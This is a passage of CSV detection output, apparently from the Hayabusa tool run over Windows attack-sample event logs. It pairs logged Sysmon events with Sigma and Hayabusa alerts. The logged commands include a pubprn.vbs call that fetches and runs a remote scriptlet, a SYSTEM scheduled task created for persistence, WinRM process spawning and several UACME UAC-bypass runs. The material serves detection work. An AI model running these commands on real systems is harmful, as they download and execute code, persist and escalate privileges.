",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module 